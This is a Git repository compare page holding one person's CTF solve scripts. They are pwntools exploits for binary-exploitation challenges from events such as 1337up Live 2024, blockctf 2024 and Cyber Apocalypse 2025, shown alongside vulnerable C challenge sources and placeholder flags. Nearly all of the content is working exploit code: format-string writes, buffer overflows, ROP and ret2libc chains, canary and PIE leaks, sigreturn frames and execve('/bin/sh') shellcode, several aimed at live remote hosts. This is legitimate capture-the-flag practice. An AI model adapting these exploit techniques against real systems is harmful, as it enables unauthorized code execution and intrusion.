jc/ctfs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: jc/ctfs:7d901b74491f365ec6c360da822813c145c8602c
Branches Tags
jc/ctfs:main
...
compare: jc/ctfs:main
Branches Tags
jc/ctfs:main

156 Commits
7d901b7449 ... main

Author SHA1 Message Date
jc 6402b4e2a9 solve script 2025-08-06 20:16:12 +03:00
jc e5e052ef8b binary 2025-08-06 20:16:04 +03:00
jc 48d9b4ecb1 oops 2025-08-06 20:05:50 +03:00
jc 7779d922cf oops 2025-08-06 20:05:30 +03:00
jc 8a12eae871 solve script 2025-08-06 19:59:17 +03:00
jc d8f2ba18d8 binary 2025-08-06 19:59:08 +03:00
jc 96683cf9ce solve script 2025-08-06 19:20:33 +03:00
jc e582d2536a binary 2025-08-06 19:20:22 +03:00
jc efa1c23dbb solve script 2025-08-06 19:18:02 +03:00
jc 15003e5606 binary 2025-08-06 19:17:53 +03:00
jc 7722ca5a21 solve script 2025-08-06 19:13:20 +03:00
jc e29ebfb654 binary 2025-08-06 19:13:10 +03:00
jc 01d5e47459 solve script 2025-08-06 19:10:38 +03:00
jc f1b113f802 binary 2025-08-06 19:10:28 +03:00
jc 3d11a08530 cleaner 2025-08-06 16:40:56 +03:00
jc 22df1755c0 solve script 2025-08-06 16:10:59 +03:00
jc 18a146b1a5 binary 2025-08-06 16:10:47 +03:00
jc 5e0b579bfc solve script 2025-08-06 16:08:46 +03:00
jc 16e21c1763 binary 2025-08-06 16:08:35 +03:00
jc 5a5b449511 solve script 2025-08-06 15:44:25 +03:00
jc 2dd6d163af binary 2025-08-06 15:44:16 +03:00
jc 9a2edba20d solve script 2025-08-06 15:41:18 +03:00
jc 476fe82faf binary 2025-08-06 15:38:12 +03:00
jc 828a4eca97 solve script 2025-08-06 15:35:19 +03:00
jc 72f01e0427 binary 2025-08-06 15:35:10 +03:00
jc c0b1f1e2d3 solve script 2025-08-06 15:30:40 +03:00
jc 831408aedf binary 2025-08-06 15:30:30 +03:00
jc 6dca4f2970 solve script 2025-08-06 15:19:24 +03:00
jc c01f22eab5 binary 2025-08-06 15:19:14 +03:00
jc d047d4a1ef solve script 2025-08-06 15:15:18 +03:00
jc baab6f675e binary 2025-08-06 15:15:07 +03:00
jc 72e17002f9 oops 2025-08-05 18:24:54 +03:00
jc d087cb7430 solve script 2025-08-05 18:19:59 +03:00
jc ec2cdb7b35 binary 2025-08-05 18:19:49 +03:00
jc 4af1604d90 solve script 2025-08-05 18:18:16 +03:00
jc c675b28f26 binary 2025-08-05 18:18:01 +03:00
jc 153fd786b8 solve script 2025-08-05 18:16:27 +03:00
jc 40c7bc25ee binary 2025-08-05 18:16:16 +03:00
jc 4a2179ad71 solve script 2025-08-05 18:14:39 +03:00
jc dbb004526e binary 2025-08-05 18:14:29 +03:00
jc 8009ca1f5f solve script 2025-07-29 01:35:56 +03:00
jc e05b881fa7 binary 2025-07-29 01:35:20 +03:00
jc 88c88f3a62 solve script 2025-05-11 22:17:10 +03:00
jc 483f58ba63 binary 2025-05-11 22:16:34 +03:00
jc b98813ca8a solve script 2025-03-27 23:58:07 +03:00
jc 4ea52ad817 fake flag 2025-03-27 23:57:54 +03:00
jc a7ad2fc055 libraries 2025-03-27 23:57:42 +03:00
jc 90dcd7da8b binary 2025-03-27 23:57:31 +03:00
jc 22ae6d18ef solve script 2025-03-27 23:57:18 +03:00
jc 7ac3f4d224 binary 2025-03-27 23:57:08 +03:00
jc 2bb59fb08f solve script 2025-03-27 23:56:51 +03:00
jc 15d9e43702 binary 2025-03-27 23:56:40 +03:00
jc 9032cf633c solve script 2025-03-27 23:56:25 +03:00
jc dbfe2c981b fake flag 2025-03-27 23:56:15 +03:00
jc 02ed79a775 libraries 2025-03-27 23:56:03 +03:00
jc a066585f12 binary 2025-03-27 23:55:51 +03:00
jc fcf3a9ee0f solve script 2025-03-27 23:54:35 +03:00
jc 7f8eed4e60 fake flag 2025-03-27 23:54:20 +03:00
jc 9d44530e70 libraries 2025-03-27 23:54:04 +03:00
jc 75d63586b3 binary 2025-03-27 23:53:38 +03:00
jc af72710a35 solve script 2025-03-21 08:10:23 +03:00
jc 9bfd5552b2 libc 2025-03-21 08:10:01 +03:00
jc 11486f525c loader 2025-03-21 08:09:50 +03:00
jc fc30e1e38c binary 2025-03-21 08:09:39 +03:00
jc e076f1ee01 solve script 2025-03-20 21:43:03 +03:00
jc ac8a3bc7a9 binary 2025-03-20 21:42:43 +03:00
jc 33e18b7b00 solve script 2025-03-20 21:32:32 +03:00
jc 775502ff2a binary 2025-03-20 21:32:08 +03:00
jc a70a98afc4 solve script 2025-03-20 21:06:43 +03:00
jc ac464ebd74 binary 2025-03-20 21:06:31 +03:00
jc e22305275f solve script 2025-03-19 02:08:17 +03:00
jc f93869c059 source code 2025-03-16 22:32:26 +03:00
jc 0310370a2e binary 2025-03-16 22:32:14 +03:00
jc 7ccc26a4f6 solve script 2025-03-12 21:26:39 +03:00
jc 37f00f4322 source code 2025-03-12 21:26:27 +03:00
jc 69328686b0 binary 2025-03-12 21:26:14 +03:00
jc 29243e6a69 solve script 2024-12-12 18:21:10 +03:00
jc 3167ec2181 solve script 2024-12-12 16:42:05 +03:00
jc 0dba4c91ab binary 2024-12-12 16:41:51 +03:00
jc a06dc4e7a8 solve script 2024-12-12 13:38:04 +03:00
jc 464e60118d binary 2024-12-12 13:37:36 +03:00
jc 34260465db solve script 2024-11-30 19:21:57 +03:00
jc de0927e6c6 libs 2024-11-30 19:21:39 +03:00
jc 227524ceac binary 2024-11-30 19:21:26 +03:00
jc 7fc17ce834 solve script 2024-11-30 19:21:10 +03:00
jc c46956e88d libc 2024-11-30 19:20:46 +03:00
jc 437625403b loader 2024-11-30 19:20:36 +03:00
jc d8af98b051 binary 2024-11-30 19:20:24 +03:00
jc deab8877c6 solve script 2024-11-29 22:06:05 +03:00
jc 534786af14 binary 2024-11-29 22:05:54 +03:00
jc a92eb896d1 solve script 2024-11-27 22:23:08 +03:00
jc 6aa37b8571 binary 2024-11-27 22:22:57 +03:00
jc 5f56f5e7e3 solve script 2024-11-27 22:22:33 +03:00
jc 4cc0dcab43 binary 2024-11-27 22:21:59 +03:00
jc e8d31313ef solve script 2024-11-27 22:21:35 +03:00
jc 9665209a76 binary 2024-11-27 22:21:20 +03:00
jc f03955debc solve script 2024-11-27 22:11:05 +03:00
jc 85d6906fae binary 2024-11-27 22:10:53 +03:00
jc d0c429824f solve script 2024-11-18 19:56:53 +03:00
jc 031201a421 solve script 2024-11-18 19:52:31 +03:00
jc 3b9dba1423 binary 2024-11-18 19:52:20 +03:00
jc 21b17c6f04 libc 2024-11-18 19:51:54 +03:00
jc 067cabe828 loader 2024-11-18 19:51:42 +03:00
jc 8709b54d81 solve script 2024-11-18 19:51:05 +03:00
jc 6ad0bccc1a binary 2024-11-18 19:50:51 +03:00
jc 634b1ab1d5 libc 2024-11-18 19:50:32 +03:00
jc 5476a2e3ff loader 2024-11-18 19:50:08 +03:00
jc 5191989368 solve script 2024-11-18 19:49:43 +03:00
jc 3d7dffbaa3 binary 2024-11-18 19:49:31 +03:00
jc a44f6a8368 libc 2024-11-18 19:49:14 +03:00
jc 05d7dab3fb loader 2024-11-18 19:48:59 +03:00
jc 10ac152ca1 solve script 2024-11-18 19:48:31 +03:00
jc 791e7b9c99 binary 2024-11-18 19:48:10 +03:00
jc 5340d5e29e solve script 2024-11-18 19:47:47 +03:00
jc 38bdf097b9 binary 2024-11-18 19:47:37 +03:00
jc f8e6ea66d2 solve script 2024-11-18 19:46:59 +03:00
jc 481177cdcb binary 2024-11-18 19:45:54 +03:00
jc 03542d0718 libc 2024-11-18 19:45:39 +03:00
jc d690f93d83 loader 2024-11-18 19:45:25 +03:00
jc c71564b667 solve script 2024-11-15 23:48:35 +03:00
jc 5fade1f343 binary 2024-11-15 23:48:21 +03:00
jc 85fea97836 solve script 2024-11-15 23:48:04 +03:00
jc 853acb8ecf C code 2024-11-15 23:47:54 +03:00
jc 9f7a92d635 solve script 2024-11-15 23:47:35 +03:00
jc 339488b990 binary 2024-11-15 23:47:22 +03:00
jc 083b13e139 solve script 2024-11-15 23:47:07 +03:00
jc b4f7309082 C code 2024-11-15 23:46:13 +03:00
jc 62b2515039 binary 2024-11-15 23:45:42 +03:00
jc 609ab7d057 second solve script 2024-11-10 21:00:24 +03:00
jc 1545329292 first solve script 2024-11-10 21:00:11 +03:00
jc ab4d74d35e binary 2024-11-10 20:59:42 +03:00
jc d4c477f9f9 binary 2024-10-29 20:31:21 +03:00
jc 4f91b8d5f8 solve script 2024-10-29 20:31:07 +03:00
jc ecb666932f solve script 2024-10-29 20:12:25 +03:00
jc 61f2abc882 binary 2024-10-29 20:12:14 +03:00
jc 4ff87bf93b solve script 2024-10-28 22:51:13 +03:00
jc 891e0d6b16 binary 2024-10-28 22:51:01 +03:00
jc fb603dfa60 solve script 2024-10-28 22:19:29 +03:00
jc 92ec613644 binary 2024-10-28 22:19:19 +03:00
jc 3e4988716a solve script 2024-10-28 21:32:26 +03:00
jc 7cbcd054c3 binary 2024-10-28 21:32:01 +03:00
jc 4153f58c73 solve script 2024-10-28 16:26:11 +03:00
jc 2abac594dc helper 2024-10-28 16:25:49 +03:00
jc dfd521d190 binary 2024-10-28 16:25:27 +03:00
jc 33d52a6d0f solve script 2024-10-28 10:03:40 +03:00
jc bfe1478c01 binary 2024-10-28 10:03:24 +03:00
jc 5534052b96 solve script 2024-10-28 01:28:03 +03:00
jc c6c10aaf35 binary 2024-10-28 01:17:58 +03:00
jc 31dbf17bda solve script 2024-10-28 01:12:36 +03:00
jc 6ccc9f60d0 binary 2024-10-28 01:12:25 +03:00
jc a4e1a18d3f solve script 2024-10-28 00:31:42 +03:00
jc 815575f8a8 binary 2024-10-28 00:31:33 +03:00
jc 5bdccf9a91 solve script 2024-10-27 22:35:45 +03:00
jc 9713fcda8c binary 2024-10-27 22:35:33 +03:00
jc db18ac85fd solve script 2024-10-27 22:32:08 +03:00
jc a90b87e454 binary 2024-10-27 22:31:56 +03:00
155 changed files with 2162 additions and 0 deletions
Expand all files Collapse all files
1337up_live_2024/floormat_mega_sale/a.py
+16
View File
@@ -0,0 +1,16 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./floormat_sale", checksec=False)
# r = process()
r = remote("floormatsale.ctf.intigriti.io", 1339)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# buf
s(b"6")
s(b"%1c%11$n"+p64(0x40408c))
r.interactive()
1337up_live_2024/floormat_mega_sale/floormat_sale
Executable
BIN
View File
Binary file not shown.
1337up_live_2024/retro2win/a.py
+27
View File
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./retro2win", checksec=False)
# r = process()
r = remote("retro2win.ctf.intigriti.io", 1338)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# gadgets
pop_rdi = 0x4009b3
pop_rsi_r15 = 0x4009b1
# leak
s(b"1337")
buf = b"A"*24
buf += p64(pop_rdi)
buf += p64(0x2323232323232323)
buf += p64(pop_rsi_r15)
buf += p64(0x4242424242424242)
buf += p64(0)
buf += p64(target.sym.cheat_mode)
s(buf)
r.interactive()
1337up_live_2024/retro2win/retro2win
Executable
BIN
View File
Binary file not shown.
1337up_live_2024/rigged_slot_machine_2/a.py
+18
View File
@@ -0,0 +1,18 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./rigged_slot2", checksec=False)
# r = process()
r = remote("riggedslot2.ctf.intigriti.io", 1337)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# buf
buf = b"A"*20
buf += p64(1337421)
s(buf)
s(b"1")
r.interactive()
1337up_live_2024/rigged_slot_machine_2/rigged_slot2
Executable
BIN
View File
Binary file not shown.
247ctf/confused_environment_read/a.py
+25
View File
@@ -0,0 +1,25 @@
#!/usr/bin/python3
from pwn import *
context.log_level = 'error'
# funcs
s = lambda a: r.sendline(a)
# buf
for i in range(1, 100):
r = remote("5108fea3f4263a9f.247ctf.com", 50099)
buf = f"%{i}$s".encode()
try:
s(buf)
r.recvuntil(b"back ")
out = r.recvlineS()
if "247CTF" in out:
print(out)
break
except:
pass
r.close()
r.interactive()
247ctf/hidden_flag_function/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hidden_flag_function", checksec=False)
# r = process()
r = remote("9fe3144560d92c37.247ctf.com", 50224)
# funcs
s = lambda a: r.sendlineafter(b"?", a)
# buf
buf = b"A"*76
buf += p64(target.sym.flag)
s(buf)
r.interactive()
247ctf/hidden_flag_function/hidden_flag_function
Executable
BIN
View File
Binary file not shown.
247ctf/hidden_flag_function_parameters/a.py
+21
View File
@@ -0,0 +1,21 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hidden_flag_function_with_args", checksec=False)
# r = process()
r = remote("f3396cb78c7c71ca.247ctf.com", 50257)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*140
buf += p32(target.sym.flag)
buf += p32(0)
buf += p32(0x1337)
buf += p32(0x247)
buf += p32(0x12345678)
s(buf)
r.interactive()
247ctf/hidden_flag_function_parameters/hidden_flag_function_with_args
Executable
BIN
View File
Binary file not shown.
4ts_ctf_2024/pas_ouf/a.py
+19
View File
@@ -0,0 +1,19 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
# r = process()
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*280
buf += p64(target.sym.gets)
buf += p64(target.sym.win)
s(buf)
s(b"flag")
r.interactive()
4ts_ctf_2024/pas_ouf/b.py
+41
View File
@@ -0,0 +1,41 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
# r = process()
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*272
buf += p64(0x404118)
buf += p64(0x40129e)
buf += b"A"*280
buf += p64(target.sym.main)
s(buf)
# leak
r.recvuntil(b"@\n")
puts = u64(r.recv(6).ljust(8, b"\x00"))
log.info("puts: %#x", puts)
libc = puts - 0x80e50
log.info("libc: %#x", libc)
system = libc + 0x50d70
sh = libc + 0x1d8678
# gadgets
pop_rdi = libc + 0x2a3e5
# pop
buf = b"A"*280
buf += p64(pop_rdi)
buf += p64(sh)
buf += p64(pop_rdi+1)
buf += p64(pop_rdi+1)
buf += p64(system)
s(buf)
r.interactive()
4ts_ctf_2024/pas_ouf/pwn-pas-ouf
Executable
BIN
View File
Binary file not shown.
blockctf_2024/echo/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./echo-app", checksec=False)
# r = process()
r = remote("54.85.45.101", 8008)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*264
buf += p64(target.sym.print_flag)
s(buf)
r.interactive()
blockctf_2024/echo/echo-app
Executable
BIN
View File
Binary file not shown.
blockctf_2024/echo/echo.c
+20
View File
@@ -0,0 +1,20 @@
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
void print_flag() {
puts(getenv("FLAG"));
puts("^^ Flag!!111!!!! ^^");
}
void do_echo() {
uint8_t echo_buffer[256] = {0};
gets(echo_buffer);
puts(echo_buffer);
}
int main(void) {
puts("ECHO! Echo! echo!");
do_echo();
return 0;
}
blockctf_2024/echo2/a.py
+28
View File
@@ -0,0 +1,28 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./echo-app2", checksec=False)
# r = process()
r = remote("54.85.45.101", 8009)
# funcs
s = lambda a: r.sendline(a)
# leak
buf = b"%39$p.%42$p"
s(buf)
leaks = r.recvS(34).split(".")
canary = int(leaks[0], 16)
log.info("canary: %#x", canary)
target.address = int(leaks[1], 16)-0x15a1
log.info("main: %#x", target.address)
# buf
buf = b"A"*264
buf += p64(canary)
buf += p64(0)
buf += p64(target.sym.print_flag)
s(buf)
r.interactive()
blockctf_2024/echo2/echo-app2
Executable
BIN
View File
Binary file not shown.
blockctf_2024/i_have_no_syscalls/a.py
+36
View File
@@ -0,0 +1,36 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./ihnsaims", checksec=False)
# r = process("./ihnsaims flag{fake_flag}", shell=True)
r = remote("54.85.45.101", 8002)
# funcs
s = lambda a: r.sendafter(b"!\n", a)
# write
s(b"1")
# shellcode
sc = """
lea r12, [rdx]
a:
lea r12, [r12+0x1000]
mov rdi, 1
mov rsi, r12
mov rdx, 0x1000
mov rax, 1
syscall
cmp rax, -14
je a
jne b
b:
xor rdi, rdi
mov rax, 231
syscall
"""
sc = asm(sc)
s(sc)
r.interactive()
blockctf_2024/i_have_no_syscalls/ihnsaims
Executable
BIN
View File
Binary file not shown.
blockctf_2024/only_ws/a.py
+24
View File
@@ -0,0 +1,24 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./only_ws", checksec=False)
# r = process()
r = remote("54.85.45.101", 8005)
# funcs
s = lambda a: r.sendline(a)
# shellcode
sc = """
mov rax, 1
mov rdi, 1
mov rsi, 0x4040a0
xor rdx, rdx
add dl, 0xff
syscall
"""
sc = asm(sc)
s(sc)
r.interactive()
blockctf_2024/only_ws/only_ws.c
+43
View File
@@ -0,0 +1,43 @@
#include <seccomp.h>
#include <syscall.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <string.h>
typedef void shellcode();
char flag[64];
int main(int argc, char **argv) {
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("error reading flag");
return -1;
}
fscanf(f, "%s", flag);
printf("Flag is at 0x%x\n", (void *)flag);
fclose(f);
char shellcode_buf[4096];
int bytes_read = read(STDIN_FILENO, shellcode_buf, sizeof(shellcode_buf));
void *shellcode_ptr =
mmap((void *)shellcode_buf, 1, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memcpy(shellcode_ptr, shellcode_buf, bytes_read);
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL_PROCESS);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
seccomp_load(ctx);
seccomp_release(ctx);
((shellcode *)shellcode_ptr)();
}
cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py
+21
View File
@@ -0,0 +1,21 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./blessing", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# leak
r.recvuntil(b"this: ")
malloced = int(r.recv(14), 16)
log.info("malloced: %#x", malloced)
# buf
r.recvuntil(b"song?")
s(str(malloced+1).encode())
s(b"0")
r.interactive()
cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/blessing
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/flag.txt
+1
View File
@@ -0,0 +1 @@
HTB{f4k3_fl4g_f0r_t35t1ng}
cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/glibc/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/glibc/libc.so.6
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/a.py
+36
View File
@@ -0,0 +1,36 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./contractor", checksec=False)
while True:
r = process()
# funcs
s = lambda a,b: r.sendafter(a, b)
sl = lambda a,b: r.sendlineafter(a, b)
fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
# leak
fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
r.recvuntil(b"C"*8)
target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
log.info("pie: %#x", target.address)
# write
opt(b"4", b"A"*28+p32(0)+b"\x40")
sl(b"> ", b"no")
opt(b"4", p64(target.sym.contract))
r.recvuntil(b"lad!\n\n")
try:
r.sendline(b"id")
if r.recvline():
break
except EOFError:
pass
r.interactive()
cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/contractor
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/flag.txt
+1
View File
@@ -0,0 +1 @@
HTB{f4k3_fl4g_f0r_t35t1ng}
cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/glibc/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/glibc/libc.so.6
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py
+37
View File
@@ -0,0 +1,37 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./crossbow", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
ss = lambda a: r.sendlineafter(b"> ", a)
# gadgets
pop_rax = 0x401001
pop_rdi = 0x401d6c
pop_rsi = 0x40566b
pop_rdx = 0x401139
syscall = 0x4015d3
mov_rax_rdi = 0x4020f5
# buf
buf = b"JUNK"*2
buf += p64(pop_rax)
buf += b"/bin/sh\0"
buf += p64(pop_rdi)
buf += p64(0x40d500)
buf += p64(mov_rax_rdi)
buf += p64(pop_rax)
buf += p64(59)
buf += p64(pop_rsi)
buf += p64(0)
buf += p64(pop_rdx)
buf += p64(0)
buf += p64(syscall)
s(b"-2")
ss(buf)
r.interactive()
cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/crossbow
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py
+42
View File
@@ -0,0 +1,42 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./laconic", checksec=False)
r = process()
# funcs
s = lambda a: r.send(a)
# gadgets
pop_rax = 0x43018
syscall = 0x43015
# sigframe
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x43005
frame.rdx = 0xff
frame.rip = syscall
# buf
buf = b"A"*8
buf += p64(pop_rax)
buf += p64(0xf)
buf += p64(syscall)
buf += bytes(frame)
# shellcode
sc = """
lea rdi, [rsi+32]
xor rsi, rsi
xor rdx, rdx
mov al, 59
syscall
"""
sc = asm(sc) + b"/bin/sh\0"
buf += sc
s(buf)
r.interactive()
cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/laconic
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/a.py
+27
View File
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./quack_quack", checksec=False)
r = process()
# funcs
s = lambda a: r.sendafter(b"> ", a)
# buf
buf = b"A"*89
buf += b"Quack Quack "
buf += b"B"
s(buf)
r.recvuntil(b"Quack Quack ")
canary = u64(r.recv(7).rjust(8, b"\x00"))
log.info("canary: %#x", canary)
# buf
buf = b"A"*88
buf += p64(canary)
buf += b"JUNK"*2
buf += p64(target.sym.duck_attack)
s(buf)
r.interactive()
cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/flag.txt
+1
View File
@@ -0,0 +1 @@
HTB{f4k3_fl4g_4_t35t1ng}
cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/glibc/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/glibc/libc.so.6
Executable
BIN
View File
Binary file not shown.
cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/quack_quack
Executable
BIN
View File
Binary file not shown.
kuwait_hackathon_2024/last_key/a.py
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/python3
from pwn import *
from ctypes import CDLL
context.binary = target = ELF("./last_key", checksec=False)
libc = target.libc
lib = CDLL("./glibc/libc.so.6")
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# nums
lib.srand(lib.time(0))
first_rand = (lib.rand() % 5) + 1
second_rand = (lib.rand() % 10) + 10
diff = second_rand - first_rand
# buf
for _ in range(diff):
s(b"R")
# gadgets
pop_rdi = lambda a: p64(0x40178d) + p64(a)
# leak
buf = b"A"*24
buf += pop_rdi(target.got.puts)
buf += p64(target.sym.puts)
buf += p64(target.sym.set_score)
s(buf)
r.recvuntil(b"prize..\n\n")
puts = u64(r.recv(6).ljust(8, b"\x00"))
log.info("puts: %#x", puts)
libc.address = puts - libc.sym.puts
log.info("libc: %#x", libc.address)
system = libc.sym.system
sh = next(libc.search(b"/bin/sh\0"))
# pop
buf = b"A"*25
buf += pop_rdi(sh)
buf += p64(0x40178e)
buf += p64(system)
s(buf)
r.interactive()
kuwait_hackathon_2024/last_key/glibc/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
kuwait_hackathon_2024/last_key/glibc/libc.so.6
BIN
View File
Binary file not shown.
kuwait_hackathon_2024/last_key/last_key
Executable
BIN
View File
Binary file not shown.
kuwait_hackathon_2024/riddle/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./riddle", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b">> ", a)
ss = lambda a: r.sendlineafter(b": ", a)
# buf
s(b"1")
ss(b"2147483647")
ss(b"1")
r.interactive()
kuwait_hackathon_2024/riddle/glibc/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
kuwait_hackathon_2024/riddle/glibc/libc.so.6
BIN
View File
Binary file not shown.
kuwait_hackathon_2024/riddle/riddle
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/daily_rootine/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./challenge", checksec=False)
# r = process()
r = remote("94.72.112.248", 5050)
# funcs
s = lambda a: r.sendlineafter(b"> ", a)
ss = lambda a: r.sendline(a)
# buf
s(b"12")
ss(b"flag.txt\0")
r.interactive()
p3rf3ctr00t_ctf_2024/daily_rootine/challenge
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/daily_rootine/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/daily_rootine/libc.so.6
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/flow/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./flow", checksec=False)
# r = process()
r = remote("94.72.112.248", 7001)
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# buf
buf = b"A"*60
buf += p32(0x34333231)
s(buf)
r.interactive()
p3rf3ctr00t_ctf_2024/flow/flow
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/heap_wars/a.py
+18
View File
@@ -0,0 +1,18 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./heap_wars", checksec=False)
# r = process()
r = remote("94.72.112.248", 1337)
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# buf
s(b"1")
buf = b"A"*80
buf += p64(target.sym.theForce)
s(buf)
r.interactive()
p3rf3ctr00t_ctf_2024/heap_wars/heap_wars
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/heap_wars/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/heap_wars/libc.so.6
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py
+32
View File
@@ -0,0 +1,32 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
# r = process()
r = remote("94.72.112.248", 1244)
# funcs
s = lambda a: r.sendline(a)
# leak
buf = b"%7$p"
s(buf)
r.recvuntil(b"tune : ")
heap = int(r.recvline().strip(), 16) + 0x850
log.info("heap: %#x", heap)
# sc
sc = """
lea rdi, [rdx+19]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
sc = asm(sc) + b"/bin/sh\0"
sc += b"A"*(32-len(sc))
sc += p64(heap)
s(sc)
r.interactive()
p3rf3ctr00t_ctf_2024/heaps_dont_lie/heaps_dont_lie
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/heaps_dont_lie/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/heaps_dont_lie/libc.so.6
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/nihil/a.py
+20
View File
@@ -0,0 +1,20 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./nihil", checksec=False)
# r = process()
r = remote("94.72.112.248", 7002)
# funcs
s = lambda a: r.sendlineafter(b"?", a)
# buf
s(b"a")
buf = b"A"*16
buf += p64(0)
buf += b"JUNK"
buf += p32(727)
s(buf)
r.interactive()
p3rf3ctr00t_ctf_2024/nihil/nihil
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/sea_shells/a.py
+65
View File
@@ -0,0 +1,65 @@
#!/usr/bin/python3
from pwn import *
